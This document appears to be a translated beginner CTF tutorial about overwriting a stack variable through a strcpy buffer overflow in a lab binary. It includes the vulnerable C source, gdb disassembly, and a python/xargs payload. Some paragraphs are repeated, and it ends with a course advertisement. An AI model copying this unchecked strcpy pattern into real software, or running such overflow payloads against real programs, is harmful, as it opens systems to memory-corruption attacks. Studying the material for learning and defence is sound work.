Friends who are new to pwn may have such doubts when doing pwn exercises, how to accurately cover variable data?
Before we do the pwn exercise, we need to know: the main function of the command line parameter C language has two parameters, the argc parameter of the int type, and the argv parameter of the char** type. The value of the argc parameter indicates the number of command line parameters, and argv points to a string array, which stores the content of specific command line parameters.
Here I will use today's experiment to introduce it to you!
This article involves related experiments: ["CTF
PWN Exercise Accurate Coverage Variable Data"](https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014110113362900001&pk_campaign=freebuf-wemedia
) (after mastering the upper and lower characters On the basis of the sequence notation, the value of the modified variable can be accurately overwritten through the well-constructed input data overflow buffer, so as to achieve the purpose of modifying the program execution logic.)
See the example code below to print command line parameter information (located in the /home/test/2 directory): #include <stdio.h>int main(int argc, char** argv){int i;for (i = 0; i < argc; ++i){printf("argv[%d] = %s\n", i, argv[i]);}return 0;}
Note that the name of the program itself is the first argument on the command line. Compile this code to generate a test program, and then execute it on the command line, try to pass in command line parameters, such as: ./test hello world
cmdline, you can see that the program prints out the specific command line parameter information:
The xargs command The xargs command of Linux can pass the input data as command line parameters to the specified program. For example, after executing the command python -c "print 'AAA BBB
CCC'" | xargs ./test, the output is:
After the python statement is executed, AAA BBB
CCC is output, which is used as the input of the xargs command through the pipeline operation, and xargs uses it as the command line parameter of the test program, so the test program will print out this information.
Xiaobai: That is, with the help of xargs, we can input the input data as command line parameters to this program.
Dadong: That’s right, there is also a byte
order, also known as endianness or endianness (English: Endianness). For a value such as 0x11223344 stored in the memory, from the perspective of each byte in the direction from the low address to the high address, the distribution of its content in the memory may be 0x11, 0x22, 0x33, 0x44, or 0x44, 0x33, 0x22 ,0x11.
This involves two storage rules: big endian format and little endian format. The schematic diagram is shown in the figure below:
The highest byte in 0x11223344 is 0x11, and the lowest byte is 0x44. We only need to remember that the little-endian format is the law of "high storage is high, low storage is low", and it is well understood. That is, in the little-endian format, the high-order byte is stored at the high address of the memory, and the low-order byte is stored at the low address of the memory.
Intel, AMD and other series of processors are in little-endian format.
Title description:
There is a pwn2 program in the /home/test/2 directory of the host. This program will process the incoming command line parameters. By constructing specific command line parameter data, you can launch an overflow attack on the program. If successful, it will prompt Congratulations, you pwned
it . , if it fails, it will prompt **Please try again.**.
The first step of source code audit is to use cd /home/test/2 to switch to the directory where the program is located, and execute cat pwn2.c to see the source code: #include <stdio.h>#include <string.h>#include <stdlib. h>int main(int argc, char** argv){int modified;char buffer[64];if (argc == 1){printf("please specify an argument\n");exit(1);}modified = 0;strcpy(buffer, argv[1]); // buffer overflow if (modified == 0x61626364){printf("Congratulations, you pwned it.\n");}else{printf("Please try again , you got 0x%08X\n”, modified);}return 0;}
How to pwn this source code?
We can try a gesture. When using the strcpy function to copy a string, the length of the target buffer is not checked. When the length of the source string exceeds the length of the target buffer, a buffer overflow will occur. Here, when a very long command line parameter data is input, a buffer overflow will occur, and the modified variable will continue to be overwritten after the data overwrites the buffer.
This program has a condition modified ==, so how much does it take to pwn out? 0x61626364
Let's continue the analysis. Execute gdb pwn2 to start debugging pwn2 through gdb. Now we need to read the assembly code of the main function, and execute the disas
main command in gdb:
The following is an explanation of the assembly code in the main function :
0x080482a0 <+0>: push %ebp
0x080482a1 <+1>: mov %esp,%ebp
0x080482a3 <+3>: and $0xfffffff0,%esp
; esp = esp - 0x60, that is, allocate 0x60) bytes of space on the stack
0x080482a6 <+6>: sub $0x60,%esp
; Determine whether the number of command line parameters is 1
0x080482a9 <+9>: cmpl $0x1,0x8(%ebp)
0x080482ad <+13>: jne 0x80482c7 <main+39>
0x080482af <+15>: movl $0x80b3dac,(%esp)
0x080482b6 <+22>: call 0x80493c0
0x080482bb <+27>: movl $0x1,(%esp)
0x080482c2 <+34>: call 0x8048e90
; The number of command parameters is not 1, indicating that the command line parameters are passed in
; The modified variable is located at esp + 0x5C, initialize it to 0
0x080482c7 <+39>: movl $0x0,0x5c(%esp)
; Get the value of argv parameter via ebp + 0xC
0x080482cf <+47>: mov 0xc(%ebp),%eax
; eax = eax + 4
0x080482d2 <+50>: add $0x4,%eax
; Get the value of argv[1]
0x080482d5 <+53>: mov (%eax),%eax
; Use argv[1] as the second parameter value of strcpy
0x080482d7 <+55>: mov %eax,0x4(%esp)
; buffer is located at esp + 0x1C, buffer is the first parameter value of strcpy
0x080482db <+59>: lea 0x1c(%esp),%eax
0x080482df <+63>: mov %eax,(%esp)
; Call strcpy to copy the string
0x080482e2 <+66>: call 0x80525b0
; Determine whether the modified value is 0x61626364
0x080482e7 <+71>: cmpl $0x61626364,0x5c(%esp)
; If not equal, jump and output failure information
0x080482ef <+79>: jne 0x80482ff <main+95>
; Output success message
0x080482f1 <+81>: movl $0x80b3dc8,(%esp)
0x080482f8 <+88>: call 0x80493c0
0x080482fd <+93>: jmp 0x8048314 <main+116>
0x080482ff <+95>: mov $0x80b3de8,%eax
0x08048304 <+100>: mov 0x5c(%esp),%edx
0x08048308 <+104>: mov %edx,0x4(%esp)
0x0804830c <+108>: mov %eax,(%esp)
0x0804830f <+111>: call 0x8049390
0x08048314 <+116>: mov $0x0,%eax
0x08048319 <+121>: leave
0x0804831a <+122>: ret
By analyzing the above assembly code, we know that buffer is located at esp+0x1C, and modified is located at esp+0x5C, and the distance between the two addresses is 0x5C - 0x1C
0x40, which is 64, is exactly the size of the buffer array. Therefore, when the data we input exceeds 64 bytes, the modified variable can be overwritten, but we need to control the value of the modified variable and carefully construct the command line parameters.
The following is verified in gdb, and the b * 0x080482e7 command is executed in gdb to set a breakpoint for the next instruction of strcpy:
Execute the r command in gdb, as follows (the data behind r is 64 A and 1234):
r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1234
That is, adding a space after the r command can be followed by a command line parameter, which is passed to the program being debugged. Press the Enter key and the program will break at the breakpoint:
Enter x $esp+0x5C in gdb to see that the value of the modified variable has been modified to 0x34333231, and 0x31 is the ASCII value of the character '1', 0x32 is the ASCII value of the character '2', and 0x33 is the character '3 ' ASCII value, 0x34 is the ASCII value of character '4':
Use the x /4xb
$esp+0x5C command to view the representation of 0x34333231 in the memory in bytes (where /4xb is used to control the output format, 4 means 4 length units, x means to display in hexadecimal, b means the unit as bytes):
Now the value of the modified variable has been modified to 0x34333231, combined with our input data 'A...A1234', 1234 is the direction from low address to high address, it can be judged that this is the representation of little endian format.
Enter the c command in gdb to let the program continue to execute, and you can see the error message output:
Now we can successfully launch an overflow attack as long as we reasonably control the content of the 65th to 68th bytes of the command line parameters.
Through the above steps, we already know that as long as the content of the 65th to 68th bytes of the command line parameters is reasonably controlled, the overflow attack can be successfully launched. Because the target machine uses little-endian format to store data, and the if statement branch requires the modified value to be 0x61626364 to pass the judgment, so the data we construct should be \x64\x63\x62\x61. If you have not exited gdb, enter the q command to exit gdb. Next, construct the input data through the python statement, and then pass it to the pwn2 program through xargs, and execute the command: python -c "print 'A'*64+'\x64\x63\x62\x61'" | xargs ./pwn2
Seeing that the overflow attack has been successfully launched, the program has been dropped by PWN!
In fact, 0x61 is the ASCII value of character a, so entering the following command can also achieve the attack effect: python -c "print 'A'*64+'dcba'" | xargs ./pwn2
This experiment was really brain-intensive, and a lot of data was analyzed and processed before the results were obtained.
Seeing that the overflow attack has been successfully launched, the program has been dropped by PWN!
In fact, 0x61 is the ASCII value of character a, so entering the following command can also achieve the attack effect: python -c "print 'A'*64+'dcba'" | xargs ./pwn2
[External link image transfer...(img-SNjX496F-1691584274873)]
This experiment was really brain-intensive, and a lot of data was analyzed and processed before the results were obtained.
at last
For students who have never been exposed to network security, we have prepared a detailed learning and growth roadmap for you. It can be said that it is the most scientific and systematic learning route, and it is no problem for everyone to follow this general direction.
At the same time, there are supporting videos for each section corresponding to the growth route:
Of course, in addition to supporting videos, various documents, books, materials & tools have been sorted out for you, and they have been classified into categories for you.
Due to the limited space, only part of the information is displayed. Friends in need can [click the card below] to get it for free: